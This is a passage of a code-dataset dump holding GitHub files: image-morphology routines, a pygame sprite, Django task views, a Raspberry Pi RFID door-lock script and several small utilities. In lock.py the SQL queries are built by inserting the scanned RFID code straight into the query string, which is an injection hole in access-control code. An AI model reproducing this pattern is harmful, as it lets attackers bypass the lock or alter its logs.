-np.ones((f1.size,), np.int32)\n print(\"Area=\",area)\n print(\"TAMANHO DA AREA\",len(area))\n N = iaNlut(s, iase2off(Bc))\n print(\"Valor N=\",N)\n pontos = f1.nonzero()[0]\n print(\"Pontos=\",pontos)\n pontos = pontos[np.lexsort((np.arange(0,-len(pontos),-1),f1[pontos]))[::-1]]\n print(\"Pontos2=\",pontos)\n for p in pontos:\n for v in N[p]:\n if f1[p] < f1[v] or (f1[p] == f1[v] and v < p):\n #print(len(N[p]))\n rv = find_area(area, v)\n if rv != p:\n if area[rv] > a or f1[p] == f1[rv]:\n area[p] = area[p] + area[rv]\n area[rv] = p\n else:\n area[p] = a\n for p in pontos[::-1]:\n if area[p] >= 0:\n g[p] = g[area[p]]\n else:\n if area[p] <= a:\n g[p] = f1[p]\n #print(g.reshape(s))\n return g.reshape(s)\n \ndef find_area(area, i):\n lista = []\n while area[i] >= 0:\n lista.append(i)\n i = area[i]\n area[lista] = i\n return i\n\n\n\nTEST3 = True\n\nif __name__ == \"__main__\":\n filename = \"images/galeao.jpg\"\n f_pil = Image.open('images/img2.png').convert('L') # must be read as grayscale\n #f_pil = Image.open('images/1_good.jpg').convert('L') # must be read as grayscale\n img = my.imread(filename)\n imgray = my.imreadgray(filename)\n recimg = \"images/rec.png\" \n \n\n if (TEST3):\n \n f = np.array(f_pil)\n \n \n disk = cv2.getStructuringElement(2, (51,51))\n image1 = Image.open(\"images/img2.png\").convert(\"1\")\n \n #PASSO 1 - OPENTH\n #imopenth = closeth(imgray,disk,1)\n imcloseth = closeth(f,disk)\n \n #my.imshow(imcloseth)\n print(\"CloseTh\")\n #th=ia.iacloseth(f,ia.iasedisk(31))\n\n\n bin1=my.thresh(f,2)\n #my.imshow(bin1)\n #bin1 = ia.iathreshad(imopenth,30)\n \n #my.imshow(bin1)\n #print(\"Threshold \")\n\n\n #rec = reconstruct(bin1)\n #my.imshow(rec)\n #print(\"Reconstrucao pós fechamento\")\n\n \n kernel1 = cv2.getStructuringElement(cv2.MORPH_CROSS, (3,3))\n hitmiss = cv2.morphologyEx(bin1, cv2.MORPH_HITMISS, kernel1)\n \n #my.imshow(hitmiss)\n #print(\"Hit-Miss\")\n \n #y = areaopen(hitmiss,4,secross())\n #m=\n m = iaareaopen(bin1,1000,kernel1)\n my.imshow(m)\n print(\"RODOU\")\n #m =ia.iaareaopen(hitmiss,1000,ia.iasebox()) \n #my.imshow(m)\n #print(\"AreaOpen\")\n #kernel = np.ones((17,17), np.uint8)\n \n #tophat_img = cv2.morphologyEx(m, cv2.MORPH_BLACKHAT, kernel)\n #my.imshow(tophat_img)\n\n \n \n g = ia.iainfrec(ia.iagray(m),imcloseth)\n #g = infrec(ia.iagray(m),imcloseth)\n #g = imreconstruct (ia.iagray(m), imcloseth) #dilatação condicional\n #my.imshow(g)\n print(\"Infrec\")\n\n\n \n h = my.thresh(g, 4.5)\n #my.imshow(h)\n print(\"Thresh\")\n\n #my.imshow(rec)\n \n \n\n\n","repo_name":"mrobertowagner/VGLGui","sub_path":"files/lotuf.py","file_name":"lotuf.py","file_ext":"py","file_size_in_byte":13239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15287990346","text":"import pygame\n\nclass Ino(pygame.sprite.Sprite):\n # klass odnogo prishelca\n\n def __init__(self, screen):\n # initializiryem i zadaem nachalnyu poziciu\n super(Ino, self).__init__()\n self.screen = screen\n self.image = pygame.image.load('img/ino.png')\n self.rect = self.image.get_rect()\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n self.x = float(self.rect.x)\n self.y = float(self.rect.y)\n\n def draw(self):\n # vivod prisheltca na ikran\n self.screen.blit(self.image, self.rect)\n\n def update(self):\n # peremeschaet prishelcev\n self.y += 0.1\n self.rect.y = self.y","repo_name":"Calider/GitTest","sub_path":"ino.py","file_name":"ino.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11123921389","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\n\nfrom django.http import HttpResponse\nfrom .models import Item\nfrom .forms import PostForm,getData\n\ndef add_task(request):\n \"\"\"Adds a new task to the list.\"\"\"\n latest_item_list = Item.objects.order_by('title')\n if request.method == 'GET':\n form = PostForm()\n else:\n form = PostForm(request.POST)\n if form.is_valid():\n title = form.cleaned_data['Task_Description']\n completed = form.cleaned_data['completed']\n post = Item.objects.create(title=title,completed=completed)\n return HttpResponseRedirect('/tasks/')\n\n return render(request, 'tasks/index.html', {'form': form,'latest_item_list': latest_item_list,})\n\ndef update_task(request,item_id):\n \"\"\"Updates an existing task in the list.\"\"\"\n item = get_object_or_404(Item, pk=item_id)\n form = getData(request.POST)\n if request.method == 'POST':\n\n if form.is_valid():\n title = form.cleaned_data['Edit_Task_Description']\n updatetask_desc = Item.objects.get(id=item_id)\n updatetask_desc.title = title\n updatetask_desc.save()\n return HttpResponseRedirect(\".\")\n else:\n form = getData()\n\n return render(request, 'tasks/detail.html', {'item': item,'form': form,})\n\ndef deleteTask(request,item_id):\n \"\"\"Delete a task in the list.\"\"\"\n item = Item.objects.get(pk=item_id)\n item.delete()\n return HttpResponseRedirect('/tasks/')\n\ndef markIt(request,item_id):\n \"\"\"Mark a task in the list as completed.\"\"\"\n item = Item.objects.get(pk=item_id)\n item.completed = True\n item.save()\n return HttpResponseRedirect('/tasks/')\n","repo_name":"rajashreemaiya/Task-List-using-Django","sub_path":"TasksApp/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38461788831","text":"#!/usr/bin/env python3\nimport sys\nimport MySQLdb\nfrom threading import Thread\nimport threading\nimport time\nimport RPi.GPIO as GPIO\nimport json\nfrom random import randint\nfrom evdev import InputDevice\nfrom select import select\nfrom twilio.rest import Client\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(13,GPIO.OUT)\nGPIO.output(13,GPIO.HIGH)\n\n\ntry:\n # python 2\n import Tkinter as tk\n import ttk\nexcept ImportError:\n # python 3\n import tkinter as tk\n from tkinter import ttk\n \nclass Fullscreen_Window:\n \n global dbHost\n global dbName\n global dbUser\n global dbPass\n \n dbHost = 'localhost'\n dbName = 'db_name'\n dbUser = 'pi_userame'\n dbPass = 'pi_pwd'\n \n def __init__(self):\n self.tk = tk.Tk()\n self.tk.title(\"Tag8 Door Lock\")\n self.frame = tk.Frame(self.tk)\n self.frame.grid()\n self.tk.columnconfigure(0, weight=1)\n \n self.tk.attributes('-zoomed', True)\n self.tk.attributes('-fullscreen', True)\n self.state = True\n self.tk.bind(\"\", self.toggle_fullscreen)\n self.tk.bind(\"\", self.end_fullscreen)\n self.tk.config(cursor=\"none\")\n \n self.show_idle()\n \n t = Thread(target=self.listen_rfid)\n t.daemon = True\n t.start()\n \n def show_idle(self):\n self.welcomeLabel = ttk.Label(self.tk, text=\"Please Present\\nYour Token\")\n self.welcomeLabel.config(font='size, 20', justify='center', anchor='center')\n self.welcomeLabel.grid(sticky=tk.W+tk.E, pady=210)\n \n def pin_entry_forget(self):\n self.validUser.grid_forget()\n self.photoLabel.grid_forget()\n self.enterPINlabel.grid_forget()\n count = 0\n while (count < 12):\n self.btn[count].grid_forget()\n count += 1\n \n def returnToIdle_fromPINentry(self):\n self.pin_entry_forget()\n self.show_idle()\n \n def returnToIdle_fromPINentered(self):\n self.PINresultLabel.grid_forget()\n self.show_idle()\n \n def returnToIdle_fromAccessGranted(self):\n GPIO.output(13,GPIO.HIGH)\n self.SMSresultLabel.grid_forget()\n self.show_idle()\n \n def toggle_fullscreen(self, event=None):\n self.state = not self.state # Just toggling the boolean\n self.tk.attributes(\"-fullscreen\", self.state)\n return \"break\"\n\n def end_fullscreen(self, event=None):\n self.state = False\n self.tk.attributes(\"-fullscreen\", False)\n return \"break\"\n \n def listen_rfid(self):\n rfid_presented = \"\"\n\n keys = \"X^1234567890XXXXqwertzuiopXXXXasdfghjklXXXXXyxcvbnmXXXXXXXXXXXXXXXXXXXXXXX\"\n dev = InputDevice('/dev/input/event0')\n rfid_presented = \"\"\n\n while True:\n r,w,x = select([dev], [], [])\n for event in dev.read():\n if event.type==1 and event.value==1:\n if event.code==28:\n \n dbConnection = MySQLdb.connect(host=dbHost, user=dbUser, passwd=dbPass, db=dbName)\n cur = dbConnection.cursor(MySQLdb.cursors.DictCursor)\n cur.execute(\"SELECT * FROM access_list WHERE rfid_code = '%s'\" % (rfid_presented))\n \n if cur.rowcount != 1:\n self.welcomeLabel.config(text=\"ACCESS DENIED\")\n #Log access attempt\n cur.execute(\"INSERT INTO access_log SET rfid_presented_datetime = NOW()\" )\n dbConnection.commit()\n time.sleep(3)\n self.welcomeLabel.grid_forget()\n self.show_idle()\n else:\n user_info = cur.fetchone()\n self.welcomeLabel.grid_forget()\n self.validUser = ttk.Label(self.tk, text=\"Welcome\\n %s!\" % (user_info['name']), font='size, 15', justify='center', anchor='center')\n self.validUser.grid(columnspan=3, sticky=tk.W+tk.E)\n GPIO.output(13,GPIO.LOW)\n rfid_presented = \"\"\n uname = user_info['name']\n cur.execute(\"INSERT INTO access_log SET user_name = '%s' , rfid_presented_datetime = NOW()\" % (uname))\n dbConnection.commit()\n dbConnection.close()\n time.sleep(2)\n self.validUser.grid_forget()\n self.show_idle()\n self.doorOpenTimeout = threading.Timer(1, self.returnToIdle_fromAccessGranted)\n self.doorOpenTimeout.start()\n else:\n rfid_presented += keys[ event.code ]\nif __name__ == '__main__':\n w = Fullscreen_Window()\n w.tk.mainloop()\n\n\n","repo_name":"RishabSanghi/Electromagnetic-Door-Lock","sub_path":"lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8457983367","text":"import sys\n\nsys.path.insert(\n 1, \"D:\\\\MyData\\\\JobHunting\\\\portofolioProjects\\\\Bounty_Hunter\\\\bounty_code\\\\\"\n)\nfrom hunter import Hunter\nfrom bounty_core import bounty_calculator\n\n# Test 1\nprint(\"~~~~ Running Test 1 ~~~~\")\nprint(\"\")\n\nasajj = Hunter(pay=200, days=5, name=\"Asajj Ventress\")\nembo = Hunter(pay=300, days=4, name=\"Embo\")\nig = Hunter(pay=100, days=8, name=\"IG-88\")\nbossk = Hunter(pay=500, days=9, name=\"Bossk\")\nzam = Hunter(pay=250, days=10, name=\"Zam Wesell\")\n\n_BOUNTY_HUNTERS = [asajj, embo, ig, bossk, zam]\n\nresult = bounty_calculator(1000, 8, _BOUNTY_HUNTERS)\n\nprint(f\"Test 1: Maximum profit is {result}\")\nprint(\"\")\n\n# Test 2 - Should return error\nprint(\"~~~ Running Test 2 ~~~~~~\")\nprint(\"\")\n\nasajj = Hunter(pay=1200, days=5, name=\"Asajj Ventress\")\nembo = Hunter(pay=2300, days=4, name=\"Embo\")\nig = Hunter(pay=3100, days=8, name=\"IG-88\")\nbossk = Hunter(pay=500, days=9, name=\"Bossk\")\nzam = Hunter(pay=1250, days=10, name=\"Zam Wesell\")\n\n_BOUNTY_HUNTERS = [asajj, embo, ig, bossk, zam]\n\nresult = bounty_calculator(200, 10, _BOUNTY_HUNTERS)\n\nprint(f\"Test 2: Maximum profit is {result}\")\n","repo_name":"nicolenlama/Bounty_Hunter","sub_path":"tests/test_advanced.py","file_name":"test_advanced.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38718121621","text":"import datetime\n\n\nSITE_CREDENTIALS = {\n 'site1': {\n 'type': 'Rosneft',\n 'login': '',\n 'password': '',\n 'url': ''\n }\n}\n\nORGANIZATION_CREDENTIALS = {\n 'organization1': {\n 'inn': '123456789012',\n 'kpp': '123456789',\n 'name': 'Организазация 1',\n 'name_full': 'Организазация 1 ООО'\n }\n}\n\nCONTRACTS_CREDENTIALS = {\n 'contract1': {\n 'id_external': '123456789',\n 'type': 'processing',\n 'number': '123456789',\n 'date': datetime.datetime.strptime('01/01/10', '%d/%m/%y')\n }\n}\n","repo_name":"riazmey/kubis_fuel","sub_path":"src/maintenance/credentials_example.py","file_name":"credentials_example.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18449485344","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mdtraj as md\n\nimport simulation.calc.observables as observables\n\nif __name__ == \"__main__\":\n n_bins = 40\n\n Q0 = [ x.rstrip(\"\\n\") for x in open(\"umbrella_last\", \"r\").readlines() ] \n\n plt.figure()\n for i in range(len(Q0)):\n\n # calculate pmf for umbrella\n os.chdir(Q0[i])\n\n if not os.path.exists(\"qtanh.npy\"):\n traj = md.load(\"traj.xtc\", top=\"conf.gro\")\n qtanh = md.compute_distances(traj, np.array([[0,57]]))\n with open(\"umbrella_params\", \"r\") as fin:\n params = fin.readline().split()\n q0 = float(params[0])\n kumb = float(params[1])\n gamma = float(params[2])\n n_frames_toss = int(params[4])/1000\n\n pairs = np.loadtxt(\"umbrella_params\", usecols=(0,1), dtype=int, skiprows=1) - 1\n r0 = np.loadtxt(\"umbrella_params\", usecols=(2,), skiprows=1)\n\n widths = (2./gamma)*np.ones(len(pairs))\n\n qtanhsum_obs = observables.TanhContactSum(\"conf.gro\", pairs, 1.2*r0, widths)\n qtanh = observables.calculate_observable([\"traj.xtc\"], qtanhsum_obs)\n\n np.save(\"qtanh.npy\", qtanh)\n else:\n qtanh = np.load(\"qtanh.npy\")\n \n n, bins = np.histogram(qtanh, bins=n_bins)\n mid_bin = 0.5*(bins[1:] + bins[:-1])\n pmf = -np.log(n)\n pmf -= pmf.min()\n\n plt.plot(mid_bin, pmf, label=\"$Q_0 = {}$\".format(Q0[i]))\n \n os.chdir(\"..\")\n\n plt.xlim(0, 150)\n plt.ylim(0, 6)\n plt.legend()\n plt.xlabel(\"End-End distance $Q_{tanh}$\")\n plt.ylabel(\"Free Energy (k$_B$T)\")\n plt.savefig(\"Fvsqtanh.pdf\", bbox_inches=\"tight\")\n plt.savefig(\"Fvsqtanh.png\", bbox_inches=\"tight\")\n plt.show()\n\n","repo_name":"ajkluber/simulation","sub_path":"gromacs/examples/q_sampling/plot_qtanh.py","file_name":"plot_qtanh.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40181702195","text":"from cyclomps.tools.utils import *\nfrom cyclomps.algs.dmrg1 import dmrg\nfrom numpy import complex_\nfrom cyclomps.mpo.asep import return_mpo\nimport cProfile\nimport pstats\n\n# System Size\nN = 10\n\n# Hamiltonian Parameters\nalpha = 0.5\ngamma = 0.5\np = 0.1\nq = 1.-p\nbeta = 0.5\ndelta = 0.5\ns = 1.\n\n# Maximum bond dimension\nmbd = [10,100]\n\n# Specify number of processors\nn = 28\n\n# Calculation Settings\nalg = 'davidson'\ntol = 1e-5\nmax_iter = 1\nmin_iter = 1\nmps_dir = 'asep_mps'\nenv_dir = 'asep_env'\nnStates = 1\nfixed_bd = True\nstate_avg = False\northonormalize = False\nend_gauge = 0\nleft = False\n\n# Set up mpo\nmpo = return_mpo(10,(alpha,gamma,p,q,beta,delta,s))\n\n# Run DMRG\nE0 = dmrg(mpo,\n alg=alg,\n dtype=complex_,\n mbd = mbd,\n tol=tol,\n max_iter=max_iter,\n min_iter=min_iter,\n mps_subdir=mps_dir,\n env_subdir=env_dir,\n nStates=nStates,\n fixed_bd=fixed_bd,\n state_avg=state_avg,\n orthonormalize=orthonormalize,\n end_gauge=end_gauge,\n left=left)\n","repo_name":"philliphelms/cyclomps","sub_path":"cyclomps/scripts/asep/increase_mbd.py","file_name":"increase_mbd.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8994433997","text":"import cfnresponse\nimport boto3, json, logging, random\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nlambdaclient = boto3.client('lambda')\n\nRequiredProperties = ['AccountId', 'FunctionName']\ndef handler(event, context):\n params = event['ResourceProperties']\n try:\n for rp in RequiredProperties:\n if rp not in params:\n raise ValueError(\n \"Required event property {0} does not exist\".format(rp))\n except ValueError as p:\n cfnresponse.send(event, context, cfnresponse.FAILED, responseData={'Data': repr(p)})\n raise\n logger.info(event)\n if event['RequestType'] == 'Create':\n logger.info(\"Create Request Recieved\")\n logger.info(\"Generating Random String for permission SID\")\n randomstring = ''.join([random.choice('abcdefghijklmnopqrstuvwxyz0123456789') for n in range(9)])\n logger.info(\"Random SID = \" + randomstring)\n\n try:\n logger.info(\"Adding Permission to function\")\n response = lambdaclient.add_permission(\n Action='lambda:InvokeFunction',\n FunctionName=params['FunctionName'],\n StatementId='xacct{}-{}'.format(params['AccountId'],randomstring),\n Principal=params['AccountId'])\n logger.info(response)\n cfnresponse.send(event, context, cfnresponse.SUCCESS, {'Data': \"Success!\"})\n except:\n logger.info('exception encountered.')\n cfnresponse.send(event, context, cfnresponse.FAILED, {'Data': \"Failed!\"}, \"Couldn't add trusted entity.\")\n raise\n else:\n logger.info('Nothing to update or delete. ' + event['RequestType'])\n cfnresponse.send(event, context, cfnresponse.SUCCESS, {'Data': \"Success!\"})","repo_name":"ranjeethap/networkprovisioner","sub_path":"src/lambda/addpermissions.py","file_name":"addpermissions.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74011494332","text":"def solution(n):\n ''' \n Write a function called solution(n) which takes a positive integer as a string and \n returns the minimum number of operations needed to transform the number of pellets to 1. \n \n Args: \n n (str): string of postive integer\n Returns:\n res (int): minimum number of operations needed to transform the number of pellets to 1\n\n Examples:\n solution(4) returns 2: 4 -> 2 -> 1\n solution(15) returns 5: 15 -> 16 -> 8 -> 4 -> 2 -> 1\n '''\n n = int(n)\n res = 0\n\n while(n!=1):\n if(n%2==0):\n n=n/2\n elif((n==3) or ((n+1)&n) > ((n-1)&(n-2))):\n n-=1\n else:\n n+=1\n res+=1\n return res\n","repo_name":"milkiaszerai/google_foobar_challenges","sub_path":"challenges/level_3_fuel-injection-perfection/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15907857671","text":"from flask import Flask\n\napp = Flask(__name__)\nprint(app.config)\n#修改配置文件内容,这里加配置会越加越多,所以一般做解耦处理另外新建一个setting文件用app3.py加载\napp.config['ENV'] = 'production'\napp.config['DEBUG'] = True\n\n\n\n@app.route('/')\ndef index():\n return '欢迎大家!····'\n\n\nif __name__ == '__main__':\n app.run(port=8000)\n\n # # print(app.config)\n # # 将setting文件中的配置项拉取过来使用\n # app.config.from_object(settings)","repo_name":"change1q2/pyflask","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73637170812","text":"from bs4 import BeautifulSoup\nimport requests\nimport urllib.request\nimport re\nimport csv\nfrom pathlib import Path\nimport json\n\n\ndef extractWords():\n print(\"On Words Working...\")\n html_doc = requests.get(URL)\n parser = BeautifulSoup(html_doc.content, 'html.parser')\n cards = parser.find_all(\"div\", {'class': 'side front'})\n words = []\n\n for item in cards:\n ID = re.findall(r\"'(.*?)'\", item['onclick'], re.DOTALL)[0]\n word = item.find(\"td\").string.split(\", \")\n plural = \"\"\n if 1 < len(word): plural = word[1]\n my_obj = {\"ID\": ID, \"word\": word[0], \"plural\": plural}\n words.append(my_obj)\n # print(json.dumps(words, indent = 4) )\n return words\n\n\ndef saveWordOnCSV(list):\n print(\"Words Saved...\")\n\n with open(path + \"/lektion_\" + Lektion + '/words.csv', 'w') as file:\n header = ['Word', 'English', 'Sentence', 'Plural']\n writer = csv.DictWriter(file, fieldnames=header)\n writer.writeheader()\n for item in list:\n writer.writerow({\n 'Word': item[\"word\"],\n 'English': ' ',\n 'Sentence': ' ',\n 'Plural': item[\"plural\"]\n })\n\n\ndef downloadVoice(list):\n print(\"On Voice Downloading...\")\n\n for item in list:\n file = path + \"/lektion_\" + Lektion + \"/voice/\" + item[\"ID\"] + \".mp3\"\n voice_path = voice_url + item[\"ID\"] + \".mp3\"\n urllib.request.urlretrieve(voice_path, file)\n\n print(\"Voice Saved...\")\n\n\nLevel = input(\"Enter Level Number EX(A1): \")\nLektion = input(\"Enter Lektion Number EX(01): \")\nprint(\"Download Lektion (\" + Lektion + \") of Level (\" + Level + \")\")\n\nURL = 'https://startenwir.com/card' + Level + '_' + Lektion + '.html'\nvoice_url = \"https://startenwir.com/assets/aud/\" + Level.lower(\n) + \"/\" + Lektion + \"/\"\npath = \"./\" + Level\n\nprint(\"Cerate Directories...\")\nPath(path).mkdir(parents=True, exist_ok=True)\nPath(path + \"/lektion_\" + Lektion).mkdir(parents=True, exist_ok=True)\nPath(path + \"/lektion_\" + Lektion + \"/voice\").mkdir(parents=True,\n exist_ok=True)\n\nlist_of_words = extractWords()\nsaveWordOnCSV(list_of_words)\ndownloadVoice(list_of_words)","repo_name":"hosseinmoazami/Web-Scraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9650697226","text":"import numpy as np\nimport pandas as pd\nimport spacy\nfrom spacy import displacy\nfrom spacy.tokens import Span\n\ndef spans_start(df):\n if len(df)==1:\n return df\n start = df.start.unique()[0]\n end = np.max(df.values)\n return pd.DataFrame([{\"start\":start,\"end\":end}])\n\ndef spans_end(df):\n if len(df)==1:\n return df\n end = df.end.unique()[0]\n start = np.min(df.values)\n return pd.DataFrame([{\"start\":start,\"end\":end}])\n\ndef spanss(df):\n df= df[['start','end']].groupby('start').apply(spans_start)\n df_start=df.reset_index(drop=True)\n df_end = df_start.groupby('end').apply(spans_end).reset_index(drop=True)\n return df_end.reset_index(drop=True)\n\ndef pep_matches_top_1(list_of_matches):\n answers={}\n if type(list_of_matches)!=list:\n list_of_matches = eval(list_of_matches)\n for ans in list_of_matches:\n name = list(ans.keys())[0]\n pep_list = list(ans.values())\n if not pep_list==[{}]:\n pep_name = list(sorted(pep_list[0].items(), key=lambda x: x[1], reverse=True)[0])[0]\n answers.update({name:pep_name})\n return answers\n\nimport re\ndef tmp_fn(df):\n # print(df)\n if type(df)==tuple:\n df=df[1]\n df = df.reset_index()\n text = list(set(df['text'].tolist()))[0]\n lst_ents=[]\n nlp = spacy.blank(\"en\")\n doc = nlp(text)\n options = {\"ents\": [\"PEP\",\"Reason\"], \"colors\": {\"PEP\": \"red\", \"Reason\":\"yellow\"}}\n # options = {\"ents\": [\"PEP\"], \"colors\": {\"PEP\": \"red\"}}\n for i, row in df.iterrows():\n accuse_char = doc.char_span(row['start_why'], row['end_why'])\n if row['pred_ans']=={}:\n continue\n for pep in row['pred_ans']:\n who_char = re.search(pep, text).span()\n who_char=doc.char_span(who_char[0], who_char[1])\n span = Span(doc, who_char.start, who_char.end, \"PEP\")\n reason = Span(doc, accuse_char.start, accuse_char.end, \"Reason\")\n if span not in lst_ents:\n lst_ents.extend([\n span,\n ])\n if reason not in lst_ents:\n lst_ents.extend([\n reason,\n ])\n doc.ents = lst_ents\n \n return doc","repo_name":"NaveedShahid/pep-app","sub_path":"helpers/spans.py","file_name":"spans.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35644737504","text":"from typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom FslBuildGen.Config import Config\nfrom FslBuildGen.DataTypes import PackageType\nfrom FslBuildGen.Exceptions import DependencyNotFoundException\nfrom FslBuildGen.Exceptions import InternalErrorException\nfrom FslBuildGen.Exceptions import InvalidDependencyException\nfrom FslBuildGen.Exceptions import UsageErrorException\nfrom FslBuildGen.Packages.Package import Package\nfrom FslBuildGen.Packages.Package import PackageDependency\nfrom FslBuildGen.Packages.PackageProjectContext import PackageProjectContext\nfrom FslBuildGen.Packages.PackageProjectContextBasePackage import PackageProjectContextBasePackage\nfrom FslBuildGen.ProjectId import ProjectId\nfrom FslBuildGen.ToolConfigBasePackage import ToolConfigBasePackage\nfrom FslBuildGen.ToolConfigPackageProjectContextUtil import ToolConfigPackageProjectContextUtil\nfrom FslBuildGen.Xml.XmlGenFile import XmlGenFile\n\n\ndef _AllocatePackage(config: Config, genFile: XmlGenFile, packageProjectContext: PackageProjectContext) -> Package:\n return Package(config, packageProjectContext, genFile)\n\nclass ProjectContextCache(object):\n def __init__(self) -> None:\n super().__init__()\n self.__Cache = dict() # type: Dict[str, PackageProjectContext]\n\n def Add(self, projectContext: PackageProjectContext) -> None:\n self.__Cache[projectContext.ProjectName] = projectContext\n\n def TryGet(self, projectName: str) -> Optional[PackageProjectContext]:\n return self.__Cache[projectName] if projectName in self.__Cache else None\n\nclass PackageManager(object):\n def __init__(self, config: Config, platformName: str, genFiles: List[XmlGenFile]) -> None:\n super().__init__()\n self.__ProjectContextCache = ProjectContextCache()\n self.__PackageFactoryFunction = _AllocatePackage\n uniqueDict = {} # type: Dict[str, Package]\n for genFile in genFiles:\n if not genFile.Name in uniqueDict:\n packageProjectContext = self.__FindProjectContext(config, genFile)\n uniqueDict[genFile.Name] = self.__PackageFactoryFunction(config, genFile, packageProjectContext)\n else:\n raise InternalErrorException(\"Package has been defined multiple times, this ought to have been caught earlier\")\n\n self.OriginalPackageDict = uniqueDict\n self.Packages = list(uniqueDict.values()) # type: List[Package]\n\n # Resolve dependency package names -> actual package objects\n for package in self.Packages:\n self.__ResolvePackageDependencies(platformName, package)\n\n def __FindProjectContext(self, config: Config, genFile: XmlGenFile) -> PackageProjectContext:\n \"\"\"\n Associate the package with the 'project' that it belongs to\n \"\"\"\n if genFile.PackageLocation is None:\n if genFile.Type != PackageType.TopLevel:\n raise UsageErrorException(\"Package '{0}' did not contain a valid location\".format(genFile.Name))\n # The top level package is not associated with a project context\n topLevelProjectContext = PackageProjectContext(ProjectId(\"__TopLevel__\"), \"__TopLevel__\", \"0.0.0.0\", [])\n self.__ProjectContextCache.Add(topLevelProjectContext)\n return topLevelProjectContext\n projectContext = ToolConfigPackageProjectContextUtil.FindProjectContext(config.ToolConfig.ProjectInfo.Contexts, genFile.PackageLocation.ResolvedPath)\n basePackages = self.__CreateBasePackageList(projectContext.BasePackages)\n packageProjectContext = self.__ProjectContextCache.TryGet(projectContext.ProjectName)\n if packageProjectContext is None:\n packageProjectContext = PackageProjectContext(projectContext.ProjectId, projectContext.ProjectName, projectContext.ProjectVersion, basePackages)\n self.__ProjectContextCache.Add(packageProjectContext)\n return packageProjectContext\n\n def __CreateBasePackageList(self, basePackages: List[ToolConfigBasePackage]) -> List[PackageProjectContextBasePackage]:\n res = [] # type: List[PackageProjectContextBasePackage]\n for basePackage in basePackages:\n res.append(PackageProjectContextBasePackage(basePackage.Name))\n return res\n\n\n\n def CreatePackage(self, config: Config, platformName: str, genFile: XmlGenFile, insertAtFront: bool = False) -> Package:\n if genFile.Name in self.OriginalPackageDict:\n raise UsageErrorException(\"Package '{0}' already exist\".format(genFile.Name))\n packageProjectContext = self.__FindProjectContext(config, genFile)\n package = self.__PackageFactoryFunction(config, genFile, packageProjectContext)\n self.__ResolvePackageDependencies(platformName, package)\n if not insertAtFront:\n self.Packages.append(package)\n else:\n self.Packages.insert(0, package)\n self.OriginalPackageDict[package.Name] = package\n return package\n\n\n def __ResolvePackageDependencies(self, platformName: str, package: Package) -> None:\n for dep in package.GetDirectDependencies(platformName):\n if not dep.Name in self.OriginalPackageDict:\n raise DependencyNotFoundException(package.Name, dep.Name)\n elif package.Type != PackageType.TopLevel and not self.OriginalPackageDict[dep.Name].AllowDependencyOnThis:\n raise InvalidDependencyException(package.Name, dep.Name)\n else:\n resolvedDep = PackageDependency(self.OriginalPackageDict[dep.Name], dep.Access)\n package.ResolvedDirectDependencies.append(resolvedDep)\n","repo_name":"radiateq/gtec-demo-framework","sub_path":".Config/FslBuildGen/PackageManager.py","file_name":"PackageManager.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"1505465924","text":"import os\nimport argparse\nfrom einops import rearrange\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\nfrom pytorch_lightning.metrics.functional import accuracy\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nimport numpy as np\nfrom numpy.random import RandomState\n\nfrom unet import UNet, ThreeDUNet, AttnUNet\nfrom unet.lit_model import LitLambdaUnet\nfrom unet.lit_3D_unet import Lit3DUnet\nfrom unet.trans_unet import VisionTransformer, TRANSCONFIG\nfrom lit_dataset import Stroke_lambda_test\nfrom config import Config\nfrom utils import *\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Train the UNet on images and target masks',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-c', '--cfg', dest='cfg', type=str, default='test',\n help=\"config file.\")\n parser.add_argument('-f', '--fold', dest='fold', type=int, default=0,\n help=\"fold.\")\n parser.add_argument('-v', '--version', dest='version', 